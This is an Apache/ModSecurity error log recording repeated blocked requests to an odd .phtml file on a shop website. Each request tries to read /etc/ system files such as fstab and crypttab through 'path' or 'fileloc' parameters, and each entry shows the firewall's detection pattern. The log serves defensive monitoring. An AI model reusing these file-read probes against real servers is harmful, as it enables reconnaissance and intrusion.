[Fri Mar 20 06:16:05.001397 2026] [:error] [pid 15826:tid 140411548894976] [client 57.141.18.20:56776] [client 57.141.18.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QVOoXxyEfFpUF8f9tSQAAAVc"]
[Fri Mar 20 06:16:05.516730 2026] [:error] [pid 9818:tid 140411649607424] [client 57.141.18.59:56780] [client 57.141.18.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QVV1pVZ5mVmJwsFMbsgAAAEs"]
[Fri Mar 20 06:16:05.819982 2026] [:error] [pid 15826:tid 140411540502272] [client 57.141.18.89:56790] [client 57.141.18.89] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QVeoXxyEfFpUF8f9tSwAAAVg"]
[Fri Mar 20 06:16:06.353935 2026] [:error] [pid 11642:tid 140411590858496] [client 57.141.18.48:56798] [client 57.141.18.48] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QVrninkcc-iUj5ApKCAAAA5I"]
[Fri Mar 20 06:16:06.641949 2026] [:error] [pid 15826:tid 140411741927168] [client 57.141.18.123:56802] [client 57.141.18.123] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QVuoXxyEfFpUF8f9tTAAAAUA"]
[Fri Mar 20 06:16:07.056505 2026] [:error] [pid 26799:tid 140411649607424] [client 57.141.18.107:56814] [client 57.141.18.107] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QV9a6ubjKNq_cu4a-AgAAA0s"]
[Fri Mar 20 06:16:07.428354 2026] [:error] [pid 7235:tid 140411649607424] [client 57.141.18.96:56824] [client 57.141.18.96] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QV_qxLDW4GITHUkTRLQAAAQs"]
[Fri Mar 20 06:16:09.100300 2026] [:error] [pid 11642:tid 140411699963648] [client 57.141.18.6:56838] [client 57.141.18.6] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/wgetrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QWLninkcc-iUj5ApKCQAAA4U"]
[Fri Mar 20 06:16:09.102604 2026] [:error] [pid 26799:tid 140411582465792] [client 57.141.18.29:56846] [client 57.141.18.29] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ethertypes"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QWNa6ubjKNq_cu4a-AwAAA1M"]
[Fri Mar 20 06:16:09.113702 2026] [:error] [pid 7893:tid 140411733534464] [client 57.141.18.124:56834] [client 57.141.18.124] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QVxCii7xarUs8iHZTzgAAAgE"]
[Fri Mar 20 06:16:09.114476 2026] [:error] [pid 11642:tid 140411658000128] [client 57.141.18.31:56848] [client 57.141.18.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QWLninkcc-iUj5ApKCgAAA4o"]
[Fri Mar 20 06:16:09.343215 2026] [:error] [pid 26799:tid 140411565680384] [client 57.141.18.58:56866] [client 57.141.18.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/e2fsck.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QWda6ubjKNq_cu4a-BQAAA1U"]
[Fri Mar 20 06:16:09.602978 2026] [:error] [pid 10189:tid 140411599251200] [client 57.141.18.63:56870] [client 57.141.18.63] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/fail2ban"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QWTJ3M9BSuKP7CAYDRAAAAJE"]
[Fri Mar 20 06:16:09.868271 2026] [:error] [pid 7235:tid 140411616036608] [client 57.141.18.8:56874] [client 57.141.18.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/host.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QWfqxLDW4GITHUkTRLwAAAQ8"]
[Fri Mar 20 06:16:11.684611 2026] [:error] [pid 7235:tid 140411557287680] [client 57.141.18.119:56884] [client 57.141.18.119] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ld.so.cache"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QWvqxLDW4GITHUkTRMAAAARY"]
[Fri Mar 20 06:16:11.687212 2026] [:error] [pid 11642:tid 140411616036608] [client 57.141.18.22:56894] [client 57.141.18.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/profile.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QW7ninkcc-iUj5ApKCwAAA48"]
[Fri Mar 20 06:16:11.690272 2026] [:error] [pid 26799:tid 140411733534464] [client 57.141.18.30:56886] [client 57.141.18.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/anacrontab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QWta6ubjKNq_cu4a-CAAAA0E"]
[Fri Mar 20 06:16:11.691040 2026] [:error] [pid 26799:tid 140411666392832] [client 57.141.18.33:56882] [client 57.141.18.33] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QWta6ubjKNq_cu4a-BwAAA0k"]
[Fri Mar 20 06:16:11.691959 2026] [:error] [pid 26799:tid 140411683178240] [client 57.141.18.112:56892] [client 57.141.18.112] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/chrony.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QW9a6ubjKNq_cu4a-CgAAA0c"]
[Fri Mar 20 06:16:11.929070 2026] [:error] [pid 26799:tid 140411691570944] [client 57.141.18.36:56910] [client 57.141.18.36] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/grep_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QW9a6ubjKNq_cu4a-DAAAA0Y"]
[Fri Mar 20 06:16:12.125970 2026] [:error] [pid 26799:tid 140411649607424] [client 57.141.18.86:56914] [client 57.141.18.86] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/fstab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QXNa6ubjKNq_cu4a-DQAAA0s"]
[Fri Mar 20 06:16:12.628589 2026] [:error] [pid 15826:tid 140411699963648] [client 57.141.18.48:56922] [client 57.141.18.48] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/centos-release-upstream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QXOoXxyEfFpUF8f9tUQAAAUU"]
[Fri Mar 20 06:16:13.114809 2026] [:error] [pid 15826:tid 140411674785536] [client 57.141.18.30:56934] [client 57.141.18.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/kdump.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QXeoXxyEfFpUF8f9tUwAAAUg"]
[Fri Mar 20 06:16:13.213495 2026] [:error] [pid 15826:tid 140411590858496] [client 57.141.18.4:56938] [client 57.141.18.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/crypttab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QXeoXxyEfFpUF8f9tVAAAAVI"]
[Fri Mar 20 06:16:13.792574 2026] [:error] [pid 15826:tid 140411658000128] [client 57.141.18.49:56946] [client 57.141.18.49] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/asound.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QXeoXxyEfFpUF8f9tVQAAAUo"]
[Fri Mar 20 06:16:14.428025 2026] [:error] [pid 7893:tid 140411649607424] [client 57.141.18.77:56962] [client 57.141.18.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QXhCii7xarUs8iHZTzwAAAgs"]
[Fri Mar 20 06:16:14.571215 2026] [:error] [pid 11642:tid 140411557287680] [client 57.141.18.17:56970] [client 57.141.18.17] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/securetty"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QXrninkcc-iUj5ApKDAAAA5Y"]
[Fri Mar 20 06:16:14.988016 2026] [:error] [pid 10189:tid 140411683178240] [client 57.141.18.31:56982] [client 57.141.18.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dnsmasq.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QXjJ3M9BSuKP7CAYDRgAAAIc"]
